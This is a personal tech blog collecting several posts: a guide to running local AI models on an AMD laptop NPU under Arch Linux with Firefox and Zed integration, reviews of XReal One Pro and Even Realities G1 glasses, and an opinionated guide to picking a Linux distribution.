Ghost In The Flame

Arch Linux & AMD NPU Power: Building Your Private AI Sandbox

2026-04-27T00:00:00+00:00

TLDR:</h1>

make sure you have the 7.0 kernel or later</p>

sudo pacman -S xrt xrg-plugin-amdxdna
sudo usermod -aG video,render
</code></pre>
Then modify the file /etc/security/limits.conf and add the following lines:</p>
* soft memlock unlimited
* hard memlock unlimited
</code></pre>
install fast flow</p>
sudo pacman -S fastflowlm
</code></pre>
reboot and run</p>
flm validate
</code></pre>
The output should read similiar to</p>
[Linux]  Kernel: 7.0.1-1-cachyos  
[Linux]  NPU: /dev/accel/accel0 with 8 columns  
[Linux]  NPU FW Version: 1.1.2.64  
[Linux]  amdxdna version: 0.6  
[Linux]  Memlock Limit: infinity
</code></pre>
install the git version of lemonade server:</p>
yay -S lemonade-server-git
</code></pre>
set the lemonade server to a port we know</p>
lemonade config port=8080
</code></pre>
open a browser to http://localhost:8080 and install a model from the fastflow npu category.</p>
follow the sections for firefox and zed config.</p>
Why</h1>
Running AI models is a great way to play around with AI features and multiply your productivity if used correctly, but using cloud based AI is both expensive and not very privacy respecting. Cloud AI uses your prompts and chats to train more AI so anything you put in that chat could be leaked or given to other users by accident. Luckily there are tons of AI models we can run locally on our own hardware. You can set up an AI server for all your devices to use, but what if you don't have a spare computer laying around that you can use for that? What if all you have is a modern laptop?</p>
Well good new! local AI models can be run on just about any hardware locally, traditionally these AI models utilize your laptop's CPU and GPU to run the models. This has a major draw back of generating a ton of heat your laptop needs to deal with, and sucks a ton of power to do so. This can eat your battery life. Luckily newer laptops have another option, the NPU or neural processing unit. NPUs are not as good at AI tasks as GPUs, but they are significantly better than normal CPU cores, and are WAY more power efficient than either. This helps keep the temperature and battery life under control.</p>
The issue has been that until very recently NPU drivers have only really been in Mac and Windows, there haven't been easy to deploy and use NPU drivers for Linux until the 7.0 Kernel. Now that the 7.0 kernel is out us penguin enthusiasts can take advantage of this hardware as well!</p>
I'm writing the blog post to go over the steps I took to get it all working and integrated with things like firefox and zed.</p>
How</h1>
Install Device Drivers and Server Stuff</h2>
First make sure you're on the 7.0 kernel or later. At the time of writing CachyOS has the 7.0.1-1 kernel installed. So if you're on CachyOS you're good to go!</p>
Next you'll want to make sure the packages xrt, xrt-plugin-amdxdna. These packages will enable the NPU and expose it to your operating system.</p>
sudo pacman -S xrt xrt-plugin-amdxdna</code></p>
Then you'll want to ensure you're user is in the render and video groups to make sure that you have permission to utilize these devices without needing to be the root account.</p>
sudo usermod -aG render,video</code></p>
Now we need to ensure that the memlock limit is set to unlimited for our user (or all users if preferred). AI tools take a lot of memory to removing this limit allows these to actually run.</p>
Edit the /etc/security/limits.conf file</p>
sudo nano /etc/security/limits.conf</code></p>
Add the following lines, replace user with your username:</p>
user soft memlock unlimited
user hard memlock unlimited
</code></pre>
or if you want to remove the limit from all users use * instead of username.</p>
* soft memlock unlimited
* hard memlock unlimited
</code></pre>
now we can install fastflow, which is an LLM provider that utilized the NPU of laptops.</p>
sudo pacman -S fastflowlm</code></p>
Then reboot your computer and run the following to ensure it all works correctly:</p>
flm validate</code></p>
This should give you the following output in green text:</p>
[Linux]  Kernel: 7.0.1-1-cachyos  
[Linux]  NPU: /dev/accel/accel0 with 8 columns  
[Linux]  NPU FW Version: 1.1.2.64  
[Linux]  amdxdna version: 0.6  
[Linux]  Memlock Limit: infinity
</code></pre>
Now we have the NPU working correctly and an llm runtime that can work with it! If all you want it a cli based LLM setup you can interact with fastflow directly, but if we want to integrate it with more tools we need something to implement either the Ollama or Openai APIs, and/or give us a GUI of some kind. There's one project that does all of that for us! It's called lemonade. At the time of writing only the git release seems to actually work with the NPU on my system, so install that.</p>
yay -S lemonade-server-git</code></p>
if desired set the lemond service to run at boot</p>
sudo systemctl enable --now lemond</code></p>
set the lemonade server to something you know.</p>
lemonade config set port=8080</code></p>
now make sure the server is working correctly by opening a browser and navigating to http://localhost:8080</p>
you should see the lemonade ui.</p>
open the model manager on the left hand side and expand the fastflow npu category to install models. I personally use gemma4-it-e2b-FLM which seems to work well, I've set the context for that models to be 16384.</p>
Integrate with Firefox</h1>
Sweet so we have a local AI server using the Laptop NPU that we can chat with, but what if I want to use it for firefox's AI features?</p>
You can do that, but it requires some additional setup on the firefox side.</p>
Open firefox and in the address bar type about:config</code> and press enter. This will popup a warning, accept the warning.</p>
In the search bar look for ml.chat.hidelocalhost and switch it to false.</p>
</p>
Now in the search bar look for ml.chat.provider and set it to http://localhost:8080</p>
</p>
Now when you click on the ai button in the side menu the lemonade server interface will show!</p>
</p>
Integrate with ZED</h1>
Open zed and click the AI button. Click the model drop down and select configure.</p>
</p>
In the configure window select Ollama and set the url to http://localhost:8080</p>
</p>
click the back button at the top and you're good to go!</p>
Conclusion</h1>
The sky is the limit now, the lemonade server provides both an ollama sytle API and an OpenAI api for things to interact with so integrate it with what ever you want!</p>



XReal One Pro Glasses Review
2026-03-26T00:00:00+00:00
Xreal One Pro Review from a Pentester</h1>
Head mounted display done right</h2>
The XREAL One Pro pair of glasses is by far the best "Head Mounted Display" solution I've used. I have used XREAL glasses in the past, from the original glasses back when they were called NREAL, to these. I wouldn't have recommended the previous pairs of glasses to anyone besides people who like to tinker and are comfortable with tech that's not quite fully baked yet. These, however, I would recommend to anyone who wants a monitor in their glasses.</p>
Special Sauce</h2>
The thing that really makes the One series from Xreal standout in the crowd is the One Chip that is built into the glasses. In the past you would need to run software on your device, or connect the glasses through the Beam device to get the spatial features.</p>
Basically without the software or Beam puck the previous glasses were just a display on your face. The screen just took up the space it had, and would not move based on your head at all. So turning your head to look at another part of the screen didn't work, looking away from the screen so see something else didn't work, and shrinking the screen to a small corner of your vision didn't work. They were just a screen inside a pair of glasses.</p>
With the One chip all of that is fixed. Now the glasses themselves do the spatial compute to keep the screen steady, lock it in place, make it smoothly follow your head movements, or even using an ultrawide screen that doesn't physically fit in the glasses field of view. This works across devices including Linux computers, Windows computers, Macs, phones, game consoles, anything with a USB-C video out port, or an adapter to turn hdmi or Display port into USB-C. No software required, no additional hardware required. Just plug them in and they do it all.</p>
Nice features</h2>
I like the One Pros a lot. One of the biggest changes besides the One chip is the Prism optics. The other glasses all use birdbath optics to reflect the image from the screens into your eyes. This came with the draw back of reflecting a ghost of whats below the glasses into your eyes as well, especially in brightly lit environments. It was easy enough to ignore, but still a bit annoying when you notice it. The prism optics in the One Pros however don't do this. They bend the light via prisms into your eyes. I haven't noticed any reflections in the image at all since using them, and I use them as my primary work monitor every day now. There is one draw back of the prism optics though. They do distort the outside world a bit if you aren't currently looking at the screen. This isn't really a bid deal, but some may find it pretty annoying if they intend to look through these glasses at other things in the real world often.</p>
Another standout feature is the speakers. Sure they aren't as good as a well tuned headset, but they are surprisingly good. The balance is decent with good bass, mid, and treble responses. Voices come through nice and cleanly so meetings, and team communication in gaming is crisp and easy to understand. The directionality of the speakers is also impressive. Sure a true 7.1 system or good surround headset will be better, but for my casual gaming I can pinpoint the location of enemies using their sound accurately enough.</p>
As for the screens, they are plenty clear and colors pop on them. The contrast of dark areas will depend on the dimming level set on the glasses (more on that later), and how bright the environment you're in is. Movies and games look fantastic on these glasses.</p>
I mentioned dimming levels. These glasses are equipped with electromagnetic lenses. Meaning you can change how dark they are in software without needing to put covers or anything else on the glasses. They have 3 dimming levels, mostly transparent, dark, and almost pitch black. The mostly transparent mode is light enough to see through the glasses pretty well, though its not perfectly transparent. Things are still dimmer then they would be without wearing the glasses. I would equate them to not very shady sunglasses. I almost never use the middle option as I don't see its purpose. The darkest mode I do use quite often. Its not opaque, but its pretty close. It makes seeing the screens very easy even in very bright environments.</p>
The head tracking also enables a really cool feature called auto dimming. Basically if you're looking at the screen you can set the dimming level to one of the darker ones then when you look away the glasses can switch to their mostly transparent mode. I use this everyday at work so when I'm looking at my primary monitor (the glasses) I see it clearly, but when I turn my head to look at my other monitors (normal screens) the glasses switch to mostly transparent so I can see them. Its a really slick system.</p>
What these glasses are not</h2>
They are not a full VR experience. The FOV of the displays is not wide enough to be used in immersive VR games and experiences.</p>
They are also not AR devices. They have the display potential, but without the XREAL EYE they can't see the environment they are in. For something to truly be AR it would have to combine the physical world with the virtual to put tags and overlays over physical objects, these can't do that, even with the EYE they don't have that functionality (at least not yet).</p>
They are not "everyday" glasses. You can get prescription inserts, but that's more for making sure the screens are clear without needing contacts. The most transparent mode is still too dark for everyday use in my opinion.</p>
They are not smart glasses. In order to be smart glasses they would have to connect to a device and integrate the notification, time, navigation, and other information into an overlay of sorts. These do not do that.</p>
What these glasses are</h2>
A fantastic monitor replacement solution. If you want a high quality monitor that doesn't take up as much room as a traditional monitor, and is easy to haul around for a mobile workstation then these are for you.</p>
They are also a great "travel monitor" to take with you on trips to keep your screen private while working on stuff or gaming.</p>
Basically the use case for these glasses is "I want a monitor on my face that only I can see."</p>
Ending thoughts</h2>
The Xreal One Pro glasses with the one chip are exactly what I've been wanting since I learned about Head Mounted Displays. The screen and speakers are very good quality, and using them as a monitor replacement is fantastic. The ultrawide mode is great for work especially combined with KDE Plasma's tiling feature to have more screen real estate than would otherwise be possible, and the 1920x1080 120hz mode is great for gaming.</p>
Overall if you want a great monitor replacement pair of glasses these are exactly what I would recommend! If you wanted more smart glasses features then I would say look at the EvenRealities G2 glasses. I have the G1 as my everyday glasses and they are fantastic, but since the screens in those glasses are monochrome, and they don't have any real way to take a video signal from a device and show the screen those aren't a good monitor replacement.</p>
One day I pray that waveguide displays advance enough that full FOV displays are possible, and the electro-chromatic lenses advance enough to be fully transparent when off that true do it all glasses are possible, but that day is not quite here yet. For the time being, using the EvenReality G1s as my everyday smart glasses and the Xreal One Pros as my montior glasses is as close as I can get for the time being.</p>


Picking a Linux Distro
2026-03-16T00:00:00+00:00
Picking a Linux Distro</h1>
So you've decided that microslop's mismanagement of Windows since about Windows 7 is too much. You want to take back control of your computer. Good for you. Welcome. I promise we don't bite... unless you're into that ;-).</p>
No but really you're making a good choice.</p>
In this post I'll be going into why people are looking to switch right now, the advantages of Linux over Windows, the drawbacks of Linux vs Windows, and finally how to pick a distro to try out. This will be a long blog post so feel free to jump around or to just skip to the section you specifically want to read more about.</p>
TLDR</h2>
But... but I put all this effort in to make sure you can make an informed decision... No, no it's fine. I get it. I wrote a lot...</p>
Distros really don't matter that much. For the most part Linux is Linux is Linux. If you have decision paralysis then just pick one and see if you like it, if you don't try another. Distro hopping until you find your home is not only normal, but often the best way to figure out what Linux distro you want to use.</p>
If you want to make a more informed decision then you'll want to read up on update strategies to see which one sounds best for your usecase, and which desktop environment comes standard on which distro as these two factors mark the biggest differences between the distros you might choose.</p>
Here's my recommendation table:</p>
Distro</th> Base</th> Update Strategy</th> Desktop</th></tr></thead>

Bazzite</td> Fedora</td> Atomic</td> Plasma</td></tr>
AuroraeOS</td> Fedora</td> Atomic</td> Plasma</td></tr>
CachyOS</td> Arch</td> Rolling</td> any (plasma is their recommendtion)</td></tr>
EndeavourOS</td> Arch</td> Rolling</td> any (plasma is their recommendation)</td></tr>
Arch</td> Arch</td> Rolling</td> Any</td></tr>
Fedora</td> Fedora</td> Point with semi rolling</td> Gnome3 and Plasma (but also have spins for any others)</td></tr>
Linux Mint</td> Debian/Ubuntu</td> Point</td> Cinnamon</td></tr>
Ubuntu</td> Debian</td> Point</td> Gnome3</td></tr>
</tbody></table>
Why switch</h2>
Maybe you're just curious. Maybe you don't actually know why you might want to switch, but heard of this Linux thing and are curious about it. Well here we welcome curiosity.</p>
There are a few main reasons people are looking to switch these days.</p>

People are tired of the constant data collection done by massive corporations.</li>
People are tired of vibe coded slop bugging up their OS and causing massive vulnerabilities.</li>
People are frustrated at paying for an operating system, and then still having ads because no you haven't given Micro$lop enough money already.</li>
People want to feel in control of their computer.</li>
</ol>
Advantages of Linux</h2>
background info</h3>
So here's where things will get a bit technical, but stick with me, it's important.</p>
Linux itself isn't an Operating System like Windows or MacOS is. Linux is jut the Kernel of the Operating system.</p>
But what does that mean?</p>
I'm glad you asked dear reader in my head. Operating systems are what Operate the equipment you're using. In this case the equipment is your computer, and everything that makes up your computer. From the CPU, to the RAM, GPU, Network ports, Storage, everything. The operating system is how these components work together to do what you want them to, like play a video game or watch silly cat videos that are probably not AI generated.</p>
To accomplish this Operating systems have two basic parts (well a ton more, but to simplify it we only care about these two parts). The Kernel and the Shell.</p>
The Kernel is what talks to your hardware. It turns your clicks and clacks into instructions that tell your computer's hardware how to beep and boop the way you want it to.</p>
The Shell is what's "wrapped" around the Kernel, it's what you're actually interacting with. Think of it this way, the shell talks to you and tells the kernel to talk to the hardware.</p>
In Windows the Kernel is the NT kernel which was introduced in windows 2000 (before that it was the DOS kernel). The shell is the Windows Explorer.</p>
So if Linux is just a kernel, then how do we get an operating system?</p>
Another great question! Most of the time when people talk about Linux as an operating systems they're referring to a whole ton of Linux based operating systems that all behave similarly to each other. These different operating systems are called Distributions or Distros for short. There are hundreds if not thousands of distros to pick from. This choice can seem overwhelming, but that's what I'm here to help you with! The great thing about the Linux kernel and the Linux operating system space in general is for the most part its all opensource.</p>
I've heard that word before, opensource, what's it mean?</p>
Opensource is a philosophy and licensing model for writing software. Basically opensource means that the source code of the software is freely available for people to read, copy, clone, edit, re-release, basically do what ever they want. This model is what allows this massive ecosystem of Distros to exist. Anyone can clone the Linux kernel and package it with other components to make their own operating system without paying a dime. Even you, if you wanted to.</p>
This contrasts Mac and Windows proprietary development model. The end software (Windows and MacOS) is provided, but the full source code is only available to Apple and Microsoft engineers, Often times you're also not allowed to redistribute their code without some kind of agreement. So even if you did get the NT source code, you couldn't legally package it into a new OS without signing an agreement with Microsoft... good luck with that.</p>
Advantages</h3>
Since Linux distros are opensource, anyone can review what the code is actually doing. This makes sure that the devs of your OS can't sneak anything in that you wouldn't like. This builds a healthy Trust but Verify culture. Where we trust our distro maintainers to write good software, but we can also verify it ourselves if we wanted to.</p>
Linux is also much lighter weight than Windows. At boot my fully built arch system (if I turn off all my auto launching applications) takes up under a gig of RAM. Which in today's RAMPolalypse is nothing to sneeze at. This means more of your system resources are available for doing what you want to do instead of being tied up by the system itself.</p>
Linux being opensource means its HIGHLY customizable and configurable. Like I said, Linux is just the kernel. Don't like the desktop shell your distro uses? you can install a different one! Not sure what desktop shell you want? install multiple and pick between them at login! Don't like the way your distro manages networks? Swap the network manager out for a different one! Anything can be swapped and switched.</p>
The goals of Linux distros vs Windows also plays a massive role in how the Operating Systems work. Linux distro devs are trying to make the best operating system they can. Microsoft is trying to use Windows to extract as much money out of you as possible. This is pretty evident.</p>
Another advantage of Linux is the creativity and persistence of Linux software devs. For example there is a software on Linux called WINE which is an acronym that stands for WINE Is Not an Emulator. WINE is a mostly complete reverse engineered implementation of Window user space, and some kernel APIs. Essentially what it does is runs a Windows programs and in real time sees what the Windows programs are asking for then translates that ask into the Linux equivalent so the Linux system can give the data it needs, then translates that data into a format that Windows applications can understand. For example, if a Windows game asks DirectX (the Windows graphic API) to draw a frame with the graphics card, WINE translates that to ask Vulkan (the Linux graphic API) to draw the frame instead. This sounds like it would make programs run slower than if you ran them directly on Windows, and sometimes that's true, but most of the time these translations are so efficient that there's no noticeable performance loss, or in some cases is actually faster than Windows. Let that sink in. Some things are so unoptomized and heavy on Windows that running it through a translation step is FASTER than running it normally.</p>
You may have heard of Proton, Valve's special sauce that made the Steamdeck as great as it is. Proton is just a fork of WINE that's been optimized for gaming specifically. Valve, unlike most big companies that utilize open source software in this manor, are actually good stewards of the projects they utilize. Valve sends the modifications they make to WINE in order to make Proton back to the WINE devs so they can decide if they want to implement Valve's fixes too. This makes the entire software stack much better and develop much faster. Valve also funds the Opensource software that they utilize. For example SteamOS (the Linux distro that runs on the Steamdeck) is based on Arch Linux and uses the KDE Plasma Desktop Environment in desktop mode. Valve donates money to both of these projects to help with their development.</p>
Drawbacks</h2>
Software Compatibility</h3>
The biggest drawback of Linux is software support. A lot of corporate paid software doesn't work on Linux. A good example of this is the Adobe Suite. Photoshop, illustrator, aftereffects, animate, acrobat, etc do not have Linux versions. There have been some successful efforts in getting these to run via WINE or a Virtual Machine type solution, but its far from perfect or usable at this time.</p>
That said, there are Opensource alternatives to most things you'd want to run available on Linux. Some of them are just as good if not better, some of them are worse. For example if you need to make vector graphics InkScape is available, it's just as usable as Illustrator. GIMP (Gnu Image Manipulate Program) is also available as a Photoshop alternative, but most would agree that GIMP is harder to use and doesn't have as many features as Photoshop. GIMP is perfectly usable software, but has a very different workflow compared with Photoshop, so whether it's "good enough" really depends on your use case and work flow.</p>
Another area people struggle with is Peripheral software, like corsair icue, razer synapse, or what ever logitech calls their heaping pile of garbage. The good news here is there are alternatives for most of what you'd want to do on Linux. Solaar is a good project for Logitech devices, giving you DPI, lighting, and button control over Logitech Mice, keyboards, microphones, and headsets. OpenRazer is a project to do what razer synapse does but on Linux. OpenRGB is a fantastic RGB lighting control software that supports a MASSIVE list of devices like motherboards, RAM sticks, LED strips, Keyboards, Mice, basically anything that has RGB lighting, OpenRGB aims to support it.</p>
Kernel Level Anticheat</h4>
This will be the biggest problem gamers run into when trying to switch to Linux. I want to dispel some misinformation here. Anticheat is not impossible on Linux. VAC works without issue on Linux both in native games and in Proton translated games. EAC and battle eye both offer developers the option to enable Proton compatibility mode. If a game uses EAC or battle eye, then the only reason it wouldn't run on Linux is the game devs specifically decided they didn't want Linux users playing their games. Even Microsoft's custom anticheat for Halo infinite works well on Proton.</p>
Why do some developers say that Anticheat is not effective on Linux? Well there's a bit of truth to that, but its more nuanced than most people are talking about. Linux is actually FAR ahead of Windows for providing the APIs required for Anticheat (and for that matter security protection software) to query the exact information they need to do their job without needing to be granted full kernel level access. We actually have Google working on Android to thank for that since proprietary apps wanted a way to make sure they weren't being reverse engineered. This is a much more safe, secure, and sane way to do the kinds of things that Anticheat wants to do. The problem then lies with the reality of Desktop game Anticheat companies not wanting to implement this since it would be a re-write of their anticheat solution for a market share of gamers that's less than 5% of their sales. So when EAC or battle eye runs in linux its running in "User Mode" meaning it watches things from the User Mode perspective. This allows cheat developers to run modified Kernel modules that would be able to trick the User mode Anticheat detection into thinking no cheating is taking place, when in fact cheating is taking place. So yes, EAC and Battle Eye are easier to bypass on Linux, but that's not Linux's fault, that's the Anticheat Developers fault. So if this annoys, bothers, or otherwise gets in your way be sure to point that frustration in the correct direction.</p>
Linux is not Windows</h3>
I know this seems obvious, but its worth noting because it is a trap many people fall into.</p>
Linux is not Windows. Linux will never be Windows. This is a good thing, but it does mean that somethings that were hard on Windows will be easy on Linux, and some things that were easy on Windows will be hard on Linux. You will get frustrated by the latter. When you do repeat after me "Linux is not Windows."</p>
Do not expect your Linux install to act exactly like your Windows install did. It simply will not.</p>
My controversial opinion: Lots of people say that if you ever have to touch the terminal then Linux is not ready for normal users. I counter that by saying if "normal users" can't figure out that typing the name of the program you want to use in a terminal is how you use it, then maybe "normal users" should stick to smartphones and chromebooks. There are distros and projects that seek to minimize your time in the terminal by offering GUIs to do most things. That's fine. If the terminal isn't your preferred way to use a computer that's ok. But the terminal is the single most powerful interface on your system. Learning how to use it is, in my opinion, an important part of learning Linux. You don't need to know how to write bash scripts or programs or whatever, but knowing how to navigate the file system, read and edit text files, and query system information are all important things to learn. The terminal isn't hard. It isn't scary. Just learn how to use it, or Google how to get the info you want.</p>
Which is easier, remembering which registry hive holds the setting your want to change, opening the registry editor to find it, then modify in the form of a DWORD, what ever that means. Or opening the terminal, finding the setting in /etc/application/config.conf file and editing the normal Text file to update the setting?</p>
Picking a distro</h2>
Ok so you've read (or skipped) all the the above info. So WHAT TF DISTRO SHOULD I PICK!?!?!?!?! WHY ARE THERE SO MANY OPTIONS!!!!!</p>
Calm down. Its not as hard as you think it is. For the most part the only difference between distros is what they use as a base, and what software they come with out of the box. This choice doesn't matter nearly as much as you think it does. My best advice would be just pick one that tickles your fancy and see how it goes. If you want to make a more informed decision then read on.</p>
Update Strategy</h3>
First, there is something to understand about the Linux world. The word "stable" means something different than normal. Stable in Linux refers to how often core system software is changed. It does not refer to how reliable the distro is, or how often you should expect it to crash.</p>
The update strategy your distro uses determines how quickly software updates are pushed out, how those updates are applied, and the overall life cycle of an OS version. At the time of writing there are 3 popular update strategies that most distros use.</p>

Point Release</li>
Rolling Release</li>
Atomic</li>
</ul>
Point release is what you're already familiar with since Windows uses this. It means there are specific "versions" of the OS. For example Ubuntu 20.04. It's called point release because as the "point number" increases, the OS version updates. This is important because each version has it's Kernel version, system libraries, and system software versions locked. Ubuntu 20.04 will use the same Kernel throughout its life cycle. Point releases are "Stable" distros because the core system software doesn't change, the only time they change is when you update to a new "Point Release" hence the name. Some claim this is good for reliability, but in my experience it really doesn't help much, and actually can make it harder to keep things fully updated. Security updates and bug fixes are normally "Back ported" to point release distros, so even if you're running an older kernel you should have all the latest security and bug fixes.</p>
Rolling Release is the exact opposite of a Point Release. Updates are shipped as soon as their ready, even for core system software. You could describe it by saying every update is a major update. Rolling Release distros tend to have much more up to date software including drivers and kernels. Because the software is shipped much quicker than in a point release, bugs tend to be shipped more often. That being said in my experience a well designed rolling release system is just as, if not more reliable than a point release system especially since bug fixes tend to ship faster as well. An example of a good rolling release system is Arch Linux.</p>
Atomic is the new kid on the block... kinda. Atomic updates are the most complicated to describe, but the least complicated to use as a user. Android, iOS, Mac, Xbox, and the Playstation have been using an atomic update strategy for years. Atomic update strategies are often paired with whats called an immutable A/B root system. When you install the system it actually creates two root file systems. The root file system is where your system libraries and software are stored. When you boot one of these systems one of the roots is selected as Active and mounted as Read Only. This means that while you're booted you can not modify the root file system, so its much harder to accidentally break something by messing around. When an update is applied the entire new root file system is shipped to the user. It then overwrites the inactive root with the new root and sets it to be the active root for the next boot. Then when the user reboots the new updated root file system is mounted as read only, applying the update. This way if the update breaks anything the user can always boot the older root file system to troubleshoot or to wait for a bug fix to be shipped. You always have a backup environment to boot in case of problems. There are a few drawbacks though, for example if you want to tinker with your install, the immutable root system is much harder to tinker on. It's not impossible, but it is harder.</p>
Base Distros</h3>
Most distros out today are just modifications to default software and themes built on top of a base distro. The popular base distros at the time of writing are:</p>

Debian</li>
Redhat</li>
Arch</li>
Suse</li>
Nix</li>
</ul>
Debian</h4>
Debian focuses on stability and is a point release distro. Debian holds the title of the "universal operating system", and can run on almost any hardware. From Desktop computers to satellites in orbit, from automated cow milkers to super computers. Debian is everywhere. Lots of people swear by debian and use it for everything, but for "normal" desktop use I would say the older packages make it frustrating for most people.</p>
Some Distros based on Debian:</p>

Ubuntu</li>
Pop!OS</li>
any Ubuntu derivitative.</li>
</ul>
Ubuntu is debian based, but it does ship newer packages by default compared to base debian.</p>
Redhat</h4>
Redhat is owned by IBM and is a point release distro. Redhat is a corporate Linux distro that is meant to be used in a business setting. It prioritizes stability as well, and is commonly used for developer workstations and servers. The more consumer focused distro based on Redhat is Fedora. Fedora is also a point release, kinda. Fedora tends to be the "testing bed" for Redhat, meaning that Fedora gets updated quickly and often. Even core system components get updated pretty frequently without a point release. I would consider Fedora a "semi rolling release". Fedora itself has spawned many distros as well.</p>

Ultramarine</li>
universal blue</li>
nobara</li>
</ul>
I don't know much about Ultramarine, but I know some people swear by it.</p>
Universal Blue is an Atomic version of Fedora and has spawned many Universal Blue based distros like Bazzite and AuroraeOS.</p>
Nobara is Fedora specifically built for gaming and comes with gaming focused software.</p>
Arch</h4>
Arch is by far the most popular rolling release distro for desktops. Arch focuses on a concept they call the "Arch Way". Essentially they aim to provide a blank slate distro that only installs the bare minimum to boot and lets the user set up everything else according to their preference. This has given it the reputation of being "hard to  get setup", especially because it does not provide a GUI installer. Unlike most distros, when you boot the Arch install disk you are not greeted with any kind of GUI, you are given a raw command line. They do provide an install script to help you get started, but also provide a fantastic wiki to help you install it all manually. Generally I would say Arch isn't great for new Linux users, since you have to already know what you want to set up before starting it. There are several distros based on arch.</p>

EndeavourOS</li>
CachyOS</li>
SteamOS</li>
Manjaro</li>
</ul>
EndeavourOS is basically just Arch with a gui installer. If you're a new user who wants to try vanilla arch but doesn't want to use the Command line to install it, this is the distro for you.</p>
CachyOS is also pretty close to just Arch with a gui installer, but it has some specific changes. CachyOS uses a different CPU scheduler compared to vanilla arch. This scheduler is more tuned for snappy desktop usage so animations and window management tends to feel a bit snappier compared to vanilla arch.</p>
SteamOS ships on the SteamDeck, and soon to be released Steam Frame, and Steam Machine. SteamOS is an atomic version of arch.</p>
Manjaro is also trying to be arch but easier for new users. Manjaro differs because it uses its own software sources, and Manjaro keeps themselves about 2 weeks behind the mainline Arch sources. They claim this is for stability and reliability, but in practice if you use software from the AUR then this update strategy tends to break more than it saves in my experience. I would not recommend Manjaro.</p>
Other distros</h4>
Suse and Nix I have not played with myself, so I can't talk about them very much. Suse is similar to Redhat, and even has a rolling release version called tumbleweed. Nix is its own thing. It focuses on repeatability. You could consider it an atomic distro that you build the image for your self. Its "declarative" which means you define what software you want installed via a configuration file.</p>
Desktop Environment</h3>
Like I said in the advantages of Linux, nothing is "just part" of Linux. Including your desktop. The Desktop Environment is what determines what the GUI you use looks like and acts like. There are two very popular Desktop environments.</p>

KDE Plasma</li>
GNOME3</li>
</ul>
Plasma is heavily focused on user customization. It gives users easy to use tools for configuring how your desktop looks and functions including a robust theming system. In the past this customization has lead to Plasma being more buggy, especially if you add a large amount of customization, however this has gotten MUCH better in recent years. By default Plasma looks and acts like Windows does, with a taskbar at the bottom, and a "start" like menu on the left side. You can change that, however, to be what you want. Want the task bar on the top or side of your monitor? you can do that! Want to split the task bar up so that the system tray is on one side and the app list and menu are on the other? You can do that! Want no task bar at all and just use the overview to switch and launch apps? You can do that too! Plasma can be what ever you want it to be.</p>
GNOME3 on the other hand takes the opposite approach. GNOME3 devs have their workflow that they like and expect their users to also like that workflow. GNOME3 is not very customizable out of the box, on par with Windows or MacOS in my opinion. If you want to theme your GNOME3 install you'll have to work for it, as the GNOME devs do not want you to theme their environment. If you want to tweak the workflow of GNOME3 you need to install a third party tweak settings menu, and those tweaks tend to break every major GNOME update. This may sound like I'm saying GNOME3 is a bad desktop. It's not. It's just very opinionated. If the default GNOME3 themes and workflows work for you then go for it! It's just not as adaptable as Plasma.</p>
While those are the two popular options there are others as well. XFCE is popular for its traditional (some would call dated) look and feel, as well as it's minimum resource usage. LXDE is also know for how lightweight it is on system resources. Cinnamon is a fork of GNOME3 that uses the same underlying technologies, but gives the user more customization options and has a more Windows like workflow by default.</p>
It is important to note that even if a distro ships with a Desktop Environment by default, you can change it after install. You can even have multiple Desktop environments installed at the same time and select between them at login. So while the desktop a distro ships with is an important consideration, don't assume that its your only option on that distro.</p>
Conclusion</h2>
If you want to switch to Linux but are having trouble picking a distro, then just pick one. If you want to make an informed decision look into the update strategy that distro uses, what distro its based on, and what desktop environment it ships with, then pick one. If that distro doesn't work for you then try another one. Distro hopping is a great way to learn what you want.</p>
Here's a table for some of my recommendations</p>
Distro</th> Base</th> Update Strategy</th> Desktop</th></tr></thead>

Bazzite</td> Fedora</td> Atomic</td> Plasma</td></tr>
AuroraeOS</td> Fedora</td> Atomic</td> Plasma</td></tr>
CachyOS</td> Arch</td> Rolling</td> any (plasma is their recommendtion)</td></tr>
EndeavourOS</td> Arch</td> Rolling</td> any (plasma is their recommendation)</td></tr>
Arch</td> Arch</td> Rolling</td> Any</td></tr>
Fedora</td> Fedora</td> Point with semi rolling</td> Gnome3 and Plasma (but also have spins for any others)</td></tr>
Linux Mint</td> Debian/Ubuntu</td> Point</td> Cinnamon</td></tr>
Ubuntu</td> Debian</td> Point</td> Gnome3</td></tr>
</tbody></table>


Smart Watch on your Face | Even Realities G1 Review
2025-10-01T00:00:00+00:00
Smart watch on your face</h1>
Even Realities G1 Review</h2>
Ordering Process</h3>
Last week I received my G1 glasses. It was time to update my prescription so I figured why not get a pair of smart glasses that actually respects your privacy! I ordered the glasses and entered my prescription. It took about two weeks to make the frames and lenses then ship them to me. The shipping was nice and fast with the longest wait time being customs clearance. Overall the process of ordering the glasses was quick, easy, and they arrived in what I would consider a reasonable time considering the custom prescription lenses had to be made for them.</p>
Do the glasses do glasses things?</h3>
TLDR: yes.</p>
The frames themselves are remarkably light considering the tech inside. They sit comfortably on my face after adjusting the nose pads a bit, and with my prescription everything is nice, clear, and crisp. My one complaint with them from a glasses use perspective is that the lenses are not anti-glare. You do get some reflections in the lenses and bright lights do glare out a bit, but that's not a huge deal for me, after a couple of hours I barely notice at all. When the screens activate they are also crisp and clear. There's a tiny bit of glow around the left most text, but nothing that is egregious or distracting. When the displays are off they are completely transparent. If you catch the light just right you might be able to see them a tiny bit, but again nothing distracting or egregious.</p>
Overall even if they didn't have displays in them the glasses themselves I would be happy with them as just normal glasses. The magnesium alloy frames around the lenses feel sturdy and have a nice touch feel. The silicon coated titanium arms are super light and a bit flexible making them grip your face nicely while having a fantastic soft touch feel. The battery and touch pad nubs are small enough that you don't really notice them, and again help grip your face nicely. They feel much more secure then my previous normal frames.</p>
I also opted to get the clip on sunglass covers. They work pretty well. The tint is a gradient, starting darker at the top and lighter towards the bottom, you may like or dislike that depending on personal preference.  I like them well enough. I do miss the convenience of the transitions lenses I had in my previous glasses, but they work well enough and with the pouch you can keep them in your pocket pretty easily.</p>
Overall they are good glasses.</p>
Are the AR tho?</h3>
TLDR: kinda but not really.</p>
I would not describe this as an AR device. Its more of a heads up display. The display is monochrome in hacker green, and activates by slightly tilting your head up. With the default app on your phone the dashboard is honestly perfect. This is the dashboard I would want on this kind of device. It displays the current date, time, temperature, notification count, upcoming calendar events, and a quick note you made with the glasses. Basically smartwatch stuff.</p>
New messages  will display a small glyph. Tilting your head up will display the content of the message. If you miss the initial notification you can tilt your head up to open the dashboard then tap once on the left touch pad to cycle through any not viewed notifications.</p>
